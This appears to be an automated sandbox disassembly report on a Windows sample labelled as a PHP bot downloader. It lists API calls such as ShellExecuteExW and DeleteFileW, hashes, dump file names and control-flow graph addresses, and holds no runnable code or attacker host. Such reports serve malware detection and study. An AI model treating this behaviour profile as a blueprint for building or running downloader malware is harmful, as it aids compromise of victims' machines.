                                                • Opcode Fuzzy Hash: 660f85d507ffcc3d8142a87e9c076f7a78da7657eb6308c16db16e608eb55c71
                                                • Instruction Fuzzy Hash: C512E32262C5D391EA21E760EC512FEA375FBD4344F840132D64E96EAAEF3CE644CB54

                                                Control-flow Graph

                                                control_flow_graph 7ff658e4742c-7ff658e47812 (node list and executed/not-executed colouring elided; the rendered graph is not recoverable from text). Windows APIs on this graph: CreateFileW at three call sites (7ff658e474de, 7ff658e47557, 7ff658e4775c), GetFileType (7ff658e475c4), GetLastError (7ff658e47591, 7ff658e475d1, 7ff658e477a3) and CloseHandle (7ff658e475d1, 7ff658e4775c). Error paths call 7ff658e35e04 and 7ff658e35e24 (_set_errno_from_matherr) and 7ff658e35db4, and all exits join at 7ff658e477f2-7ff658e47812.
                                                APIs
                                                Memory Dump Source: same dump as the first record above (0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, offset 00007FF658E20000, based on PE); snapshot file hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd.
                                                Similarity
                                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                                • String ID:
                                                • API String ID: 1330151763-0
                                                • Opcode ID: b051788a4b9f1cecd37e765c46742b5fa343634d29695278168d0b16224b77b6
                                                • Instruction ID: 6a38a86ea7c28ee26538641fc3c69d1df079341e811ede2445468cf6e1faf09c
                                                • Opcode Fuzzy Hash: b051788a4b9f1cecd37e765c46742b5fa343634d29695278168d0b16224b77b6
                                                • Instruction Fuzzy Hash: 5FC1D237B24A6585EB10CF79C4906AC3771F788B98B140225DE6EA7BE4DF38E452C344

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source: same dump as the first record above (0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, offset 00007FF658E20000, based on PE); snapshot file hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd.
                                                Similarity
                                                • API ID: __scrt_fastfail$__scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 2735655165-0
                                                • Opcode ID: 4838486631ff523eeef2ecb4245ae7cd1383d3c604e78f70fc5114c1b9c52c62
                                                • Instruction ID: 09db3cb2f9db44d862be8b6e36f616d9374bbedc722765d2d196c91ce7ee65b9
                                                • Opcode Fuzzy Hash: 4838486631ff523eeef2ecb4245ae7cd1383d3c604e78f70fc5114c1b9c52c62
                                                • Instruction Fuzzy Hash: 5F313961F0C27B85FA54A77598127B912B1AF81344F4C4434EA4FEBAE7CE7DE8058208

                                                Control-flow Graph

                                                control_flow_graph 7ff658e3ddcc-7ff658e3e0a5 (node list and executed/not-executed colouring elided; the rendered graph is not recoverable from text). Windows APIs on this graph: GetConsoleMode (7ff658e3deb8), WriteFile (7ff658e3dfdb) and GetLastError (7ff658e3df4c, 7ff658e3e002). The invalid-parameter path at 7ff658e3ddfa calls 7ff658e35e04, 7ff658e35e24 and 7ff658e335fc; the other paths go through 7ff658e3bf24, 7ff658e4675c, 7ff658e3d480, 7ff658e3d950, 7ff658e3db70, 7ff658e3da54 and 7ff658e35db4, and all exits join at 7ff658e3e08e-7ff658e3e0a5.
                                                APIs
                                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FF658E3DE0D
                                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF658E3DD8B,?,?,FFFFFFFE,00007FF658E3E7C2), ref: 00007FF658E3DECC
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF658E3DD8B,?,?,FFFFFFFE,00007FF658E3E7C2), ref: 00007FF658E3DF4C
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 2210144848-0
                                                • Opcode ID: 8225f0bb8bc109e91bb0b0dc42c1d2d10c0c76c435bde0e5dc91867a131cd7c0
                                                • Instruction ID: fae7ef0155aab66df489c589bc885ae57745d93ecda3cb7c0f6a8d8ac9876d3d
                                                • Opcode Fuzzy Hash: 8225f0bb8bc109e91bb0b0dc42c1d2d10c0c76c435bde0e5dc91867a131cd7c0
                                                • Instruction Fuzzy Hash: 2B81B022F1862285FB519B7198802BC66B0BB44B94F480135DA4EE7FA5DF3CBC45C718

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: Process$CurrentExitTerminate
                                                • String ID:
                                                • API String ID: 1703294689-0
                                                • Opcode ID: 0cf961d5a59d52704767c47960e182a4548ebef7e2a4c77c03120b1d081cdc36
                                                • Instruction ID: 04d24e899b261131ac6002edb87a3cef2e7e18b5f364ed9b615654c22b3a6653
                                                • Opcode Fuzzy Hash: 0cf961d5a59d52704767c47960e182a4548ebef7e2a4c77c03120b1d081cdc36
                                                • Instruction Fuzzy Hash: C5E0BF64B0473A82FB546B719C962792276AFC5741F185438C84F97B72CE3EFC498209

                                                Control-flow Graph

                                                APIs
                                                • shared_ptr.LIBCMTD ref: 00007FF658E21F72
                                                  • Part of subcall function 00007FF658E22690: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF658E226FD
                                                  • Part of subcall function 00007FF658E24EC0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF658E24EDB
                                                  • Part of subcall function 00007FF658E239A0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF658E239B3
                                                  • Part of subcall function 00007FF658E21AB0: type_info::_name_internal_method.LIBCMTD ref: 00007FF658E21B0A
                                                  • Part of subcall function 00007FF658E21AB0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF658E21CC8
                                                  • Part of subcall function 00007FF658E21AB0: ShellExecuteExW.SHELL32 ref: 00007FF658E21CFD
                                                  • Part of subcall function 00007FF658E21AB0: WaitForSingleObject.KERNEL32 ref: 00007FF658E21D1C
                                                  • Part of subcall function 00007FF658E21AB0: GetExitCodeProcess.KERNEL32 ref: 00007FF658E21D2F
                                                  • Part of subcall function 00007FF658E21AB0: CloseHandle.KERNEL32 ref: 00007FF658E21D3D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: Concurrency::details::EmptyQueue::StructuredWork$CloseCodeExecuteExitHandleObjectProcessShellSingleWaitshared_ptrtype_info::_name_internal_method
                                                • String ID: " -C "
                                                • API String ID: 4074718890-1510411174
                                                • Opcode ID: e3e65493c5c93f8778879d6a5c36af1fba031270d7209929f3d3be2bd247b050
                                                • Instruction ID: 5fb335c0b3f034330c32fce12cb065107d1a0c05bdc73160f6beeb79c04caa45
                                                • Opcode Fuzzy Hash: e3e65493c5c93f8778879d6a5c36af1fba031270d7209929f3d3be2bd247b050
                                                • Instruction Fuzzy Hash: 2E51E732609AC291E660DB65F8512EBB3B0FBC4780F444132E68E97B69EF3CE545CB44

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00007FF658E239A0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF658E239B3
                                                  • Part of subcall function 00007FF658E21EA0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF658E21ECC
                                                  • Part of subcall function 00007FF658E21EA0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,00007FF658E213D0), ref: 00007FF658E21ED4
                                                  • Part of subcall function 00007FF658E2AC70: _Func_class.LIBCONCRTD ref: 00007FF658E2ACA3
                                                • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF658E221CB
                                                • DeleteFileW.KERNEL32 ref: 00007FF658E221D3
                                                  • Part of subcall function 00007FF658E24EF0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF658E24F0B
                                                  • Part of subcall function 00007FF658E24EC0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF658E24EDB
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: Concurrency::details::EmptyQueue::StructuredWork$File$DeleteExistsFunc_classPath
                                                • String ID:
                                                • API String ID: 1167149137-0
                                                • Opcode ID: 79ad5cdaee4071a0cad61ef7f1825c95ea4057d6b39a588d18dca4a3cd80d58a
                                                • Instruction ID: fd5bfc2478f5cf55fb02eeb179d2964fd4018dbbb3aac2c253fcbae254bf4a5f
                                                • Opcode Fuzzy Hash: 79ad5cdaee4071a0cad61ef7f1825c95ea4057d6b39a588d18dca4a3cd80d58a
                                                • Instruction Fuzzy Hash: 5321EE32A1C69685E660EB21E85136BA371FBC5744F440131E68EA7E9ADF3CE504CB04

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00007FF658E2AC70: _Func_class.LIBCONCRTD ref: 00007FF658E2ACA3
                                                • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF658E21ECC
                                                • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,00007FF658E213D0), ref: 00007FF658E21ED4
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: Concurrency::details::EmptyExistsFileFunc_classPathQueue::StructuredWork
                                                • String ID:
                                                • API String ID: 751013954-0
                                                • Opcode ID: 7fdefa42ffe60eb363dab5a25b184e42fb5ef18f0cb8c92bda0a5a5edec4f82c
                                                • Instruction ID: fda232e97a5567a24842bab169328c61db7fe30d8c2c3529a49e02da5681d6a7
                                                • Opcode Fuzzy Hash: 7fdefa42ffe60eb363dab5a25b184e42fb5ef18f0cb8c92bda0a5a5edec4f82c
                                                • Instruction Fuzzy Hash: C6018412A0C69680EA20E731EC5117F7B70EBC5784F480131E6CE96E96CE3CE2448F04

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 616 7ff658e349a0-7ff658e349cb 617 7ff658e349e7 616->617 618 7ff658e349cd-7ff658e349d0 616->618 619 7ff658e349e9-7ff658e34a05 617->619 618->617 620 7ff658e349d2-7ff658e349d5 618->620 621 7ff658e34a06-7ff658e34a09 620->621 622 7ff658e349d7-7ff658e349e2 call 7ff658e35e24 call 7ff658e335fc 620->622 621->622 623 7ff658e34a0b-7ff658e34a17 621->623 622->617 623->622 626 7ff658e34a19-7ff658e34a22 623->626 628 7ff658e34a2a 626->628 629 7ff658e34a24-7ff658e34a28 626->629 630 7ff658e34a30-7ff658e34a3a 628->630 629->630 631 7ff658e34a3d 630->631 632 7ff658e34b42-7ff658e34b45 631->632 633 7ff658e34a43-7ff658e34a4d 631->633 632->619 634 7ff658e34a91-7ff658e34a97 633->634 635 7ff658e34a4f-7ff658e34a54 633->635 636 7ff658e34a99-7ff658e34a9e 634->636 637 7ff658e34b11-7ff658e34b19 call 7ff658e3e854 634->637 635->634 638 7ff658e34a56 635->638 640 7ff658e34aa0-7ff658e34aaa call 7ff658e33f60 636->640 641 7ff658e34ab1-7ff658e34ab7 636->641 645 7ff658e34b1e-7ff658e34b21 637->645 642 7ff658e34afc 638->642 643 7ff658e34a5c-7ff658e34a61 638->643 644 7ff658e34b01-7ff658e34b0c 640->644 657 7ff658e34aac 640->657 647 7ff658e34ab9-7ff658e34ac1 641->647 648 7ff658e34ac4-7ff658e34ae0 call 7ff658e3d1d8 call 7ff658e3dce0 641->648 642->644 643->644 649 7ff658e34a67-7ff658e34a8c call 7ff658e2e4c0 643->649 644->619 645->644 651 7ff658e34b23-7ff658e34b32 645->651 647->648 660 7ff658e34ae5-7ff658e34ae8 648->660 655 7ff658e34b37-7ff658e34b3d 649->655 651->655 656 7ff658e34b34 651->656 655->631 656->655 657->641 660->642 661 7ff658e34aea-7ff658e34afa 660->661 661->642 661->655
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: _invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 3215553584-0
                                                • Opcode ID: 4f883b95f7da27380a1c8dc92d1d8b1f3044823d872828230510567fc2dfe5a8
                                                • Instruction ID: 7aacfd3b9fd63494d1223bb072fa79b4838f2fcececf91f931f908acffbe1a52
                                                • Opcode Fuzzy Hash: 4f883b95f7da27380a1c8dc92d1d8b1f3044823d872828230510567fc2dfe5a8
                                                • Instruction Fuzzy Hash: 4541B161B0826646EA689936590023D72A1AF54FE8F1C4234DE6DE7FE9DE3CFC41870C

                                                Control-flow Graph

                                                APIs
                                                • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00007FF658E236F4
                                                  • Part of subcall function 00007FF658E23680: DNameNode::DNameNode.LIBCMTD ref: 00007FF658E2368E
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: NameProcessorVirtual$Concurrency::NodeNode::RootRoot::
                                                • String ID:
                                                • API String ID: 708125375-0
                                                • Opcode ID: c23f3cb0eba1474faa08fb5fd51b8bc61fb7488c62b3203690764f73a4b9d535
                                                • Instruction ID: cce1c3c226c7f9889530a3ee6684d611a038ead9856b20e76ac746d638b1ad92
                                                • Opcode Fuzzy Hash: c23f3cb0eba1474faa08fb5fd51b8bc61fb7488c62b3203690764f73a4b9d535
                                                • Instruction Fuzzy Hash: 6931EB72718B9582DB10DB29E49172EB7B0FBC6B84F504425EB8D93B29DF3DD8108B04

                                                Control-flow Graph

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ae5b57370f23d51800a9b1807dfedf1ba41dfc8965c0f84bd68db13f37ff051e
                                                • Instruction ID: c114e200fc80bb0b4b92a04ee7a15641e6be6ff3a02c764641dc768f63b3f157
                                                • Opcode Fuzzy Hash: ae5b57370f23d51800a9b1807dfedf1ba41dfc8965c0f84bd68db13f37ff051e
                                                • Instruction Fuzzy Hash: C721B532F0826255E7016F36A84137C3670AF40BA1F594634E91DA7BE2CE7CFC418708

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: _invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 3215553584-0
                                                • Opcode ID: 242aa104a256ba5b2150a3216f3597a632c2a9ef4fcd88e67720f97e344cd703
                                                • Instruction ID: 9172be1a9112540e80c4531ef99f4906e08ff721d3e0a5551bf29dc72ad76baf
                                                • Opcode Fuzzy Hash: 242aa104a256ba5b2150a3216f3597a632c2a9ef4fcd88e67720f97e344cd703
                                                • Instruction Fuzzy Hash: F521953260865187EB619F29E44037976B0EBC5B94F284235E69DD7AF9DF3DD8048B04

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: HandleModule$AddressFreeLibraryProc
                                                • String ID:
                                                • API String ID: 3947729631-0
                                                • Opcode ID: a81a60bed567f56c1a5b8481f21f90bb2bad9351e94e3c75933ccff56822174f
                                                • Instruction ID: da218c11df0d42727b4280be3a08b887603062bce9d67eb20f3058cd15a20df3
                                                • Opcode Fuzzy Hash: a81a60bed567f56c1a5b8481f21f90bb2bad9351e94e3c75933ccff56822174f
                                                • Instruction Fuzzy Hash: 03218371E04B2189EB508F74C4412EC37F0EB44708F484535EA4DA2EA5EF39ED86CB84
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: _invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 3215553584-0
                                                • Opcode ID: c58a6de67e2055b790713986da8547549aa067ac248cc4a518fd06b724001c9a
                                                • Instruction ID: 4a9f55db749e0014d7541034fec4f94a2fa1885e95647387377ab8fd08c2185a
                                                • Opcode Fuzzy Hash: c58a6de67e2055b790713986da8547549aa067ac248cc4a518fd06b724001c9a
                                                • Instruction Fuzzy Hash: 47117221A0C6A651FA619B31E40137A96F0AF85B85F5C4430EA4DEBFA6DF3CFC028704
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: _invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 3215553584-0
                                                Similarity
                                                • API ID: _invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 3215553584-0
                                                Similarity
                                                • API ID: _invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 3215553584-0
                                                APIs
                                                • HeapAlloc.KERNEL32(?,?,?,00007FF658E41175,?,?,00000000,00007FF658E4334B,?,?,?,00007FF658E392FF,?,?,?,00007FF658E391F5), ref: 00007FF658E3F772
                                                Similarity
                                                • API ID: AllocHeap
                                                • String ID:
                                                • API String ID: 4292702814-0
                                                Similarity
                                                • API ID: AddressProc$HandleModule
                                                • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                • API String ID: 667068680-295688737
                                                Similarity
                                                • API ID: ErrorLastNameTranslate$CodePageValid
                                                • String ID: utf8
                                                • API String ID: 2136749100-905460609
                                                Similarity
                                                • API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                • String ID:
                                                • API String ID: 3939093798-0
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                • String ID:
                                                • API String ID: 1239891234-0
                                                Similarity
                                                • API ID: ErrorFileLastWrite$Console
                                                • String ID:
                                                • API String ID: 786612050-0
                                                Similarity
                                                • API ID: InfoLocaletry_get_function
                                                • String ID: GetLocaleInfoEx
                                                • API String ID: 2200034068-2904428671
                                                Similarity
                                                • API ID: InfoLocale$ErrorLast_invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 3644580040-0
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Similarity
                                                • API ID: ErrorLast$InfoLocale
                                                • String ID:
                                                • API String ID: 3736152602-0
                                                APIs
                                                  • Part of subcall function 00007FF658E3BF24: GetLastError.KERNEL32 ref: 00007FF658E3BF33
                                                  • Part of subcall function 00007FF658E3BF24: SetLastError.KERNEL32 ref: 00007FF658E3BFD1
                                                • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF658E46227,?,00000000,00000092,?,?,00000000,?,00007FF658E3A2C1), ref: 00007FF658E45ADA
                                                Similarity
                                                • API ID: ErrorLast$EnumLocalesSystem
                                                • String ID:
                                                • API String ID: 2417226690-0
                                                APIs
                                                  • Part of subcall function 00007FF658E3BF24: GetLastError.KERNEL32 ref: 00007FF658E3BF33
                                                  • Part of subcall function 00007FF658E3BF24: SetLastError.KERNEL32 ref: 00007FF658E3BFD1
                                                • GetLocaleInfoW.KERNEL32(?,?,?,00007FF658E45DA1), ref: 00007FF658E4602F
                                                Similarity
                                                • API ID: ErrorLast$InfoLocale
                                                • String ID:
                                                • API String ID: 3736152602-0
